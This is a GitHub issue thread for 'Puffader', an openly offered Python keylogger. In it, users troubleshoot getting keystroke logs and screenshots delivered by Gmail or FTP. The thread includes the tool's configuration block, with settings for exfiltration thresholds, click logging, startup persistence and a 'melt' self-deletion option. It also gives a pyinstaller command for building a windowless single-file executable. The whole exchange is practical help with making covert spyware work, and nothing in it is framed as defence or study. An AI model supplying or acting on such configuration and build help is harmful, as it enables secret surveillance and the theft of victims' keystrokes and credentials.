xp4xbox / Puffader

Python 2.7 is obsolete, please use https://github.com/xp4xbox/Python-Keylogger
MIT License
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Cannot close and send keylogs. #44

Closed ghost closed 6 years ago

ghost commented 6 years ago


I got error when I use py2exe to compile so I use pyInstaller instead without any problem.

My problem is: When I run the exe file, it launches and starts sending screen shot every 120 seconds as default. But I do not receive any keylog even if I reduced 1000 chars to 200. No matter how many times I tried it didn't work out.

Second issue is to close Puffader with key combination of ctrl+right shift+left shift+h I tried many times but it keeps sending screenshots.

What might be the problem?

tehseensagar commented 6 years ago

dear share your initial config , try to reduce it to 50 instead of 200.


ghost commented 6 years ago

Dear @tehseensagar

I already set Gmail as mentioned so I can receive screenshots via email. I just cannot receive keylogs on time.

And key combination to close Puffader does not work for me.


ghost commented 6 years ago

OK, I understand what happens:

When I first launched my exe file, intCharPerSend was set to 1000. Then I used the key combination to close Puffader and assumed it closed. I change intCharPerSend to 200, compiled and run the program again. Tried typing over 200 letters and when I did not receive keylogs, I assumed it doesn't work but I have just received an e-mail with 2000+ chars.

My issue remains as closing the program.

xp4xbox commented 6 years ago

Try latest commit @corefinding for the program not stopping.

ghost commented 6 years ago

@xp4xbox sorry for my late reply due to business travel for four days.

I downloaded the Puffader again and compiled it via pyInstaller with the settings below:

blnFTP = "False" # if using ftp set this to True and configure the options below strFtpServer = "" intFtpPort = 21 strFtpUser = "" strFtpPass = "" strFtpRemotePath = "/"

intCharPerSend = 200 # set num of chars before send log/store

blnUseTime = "True" # if you prefer to use a timer to send/save logs, set this to True intTimePerSend = 300 # set how often to send/save logs in seconds

blnStoreLocal = "False" # True to save logs/screens locally strLogFile = "c:/temp/test.txt" # set non-protected path to text file eg. c:/temp/test.txt

blnScrShot = "False" # set to True for capturing screenshots strScrDir = "" # set non-protected dir for scrshot location if storing locally. eg c:/temp intScrTime = 600 # set time for taking screen in seconds

blnLogClick = "True" # for logging window clicks blnAddToStartup = "False"

blnLogClipboard = "False" blnMelt = "True"

ctrl + rshift + lshift + h key combination still doesn't work. I tried this keys in the following forms:

On desktop;

None of those are working. Do you think it might be related to compiling with pyInstaller instead of py2exe?

xp4xbox commented 6 years ago

Maybe, try running without compiling. I am using those settings with no problem.

ghost commented 6 years ago

@xp4xbox I tried it just by running Puffader.py and still not working.

Is there anything I can try?

tehseensagar commented 6 years ago

First of all I would suggest you to have a look on these variable settings as per below

intCharPerSend = 100 # set num of chars before send log/store

blnUseTime = "False" # if you prefer to use a timer to send/save logs, set this to True intTimePerSend = 60 # set how often to send/save logs in seconds strLogFile = ""

And also let us know either you are trying to send logs via email or not.

try to rebuild the config using above settings , I'm assuming you are using gmail method.

pyinstaller --noconsole --onefile Puffader.py


xp4xbox commented 6 years ago

I will keep this open for 1 more week.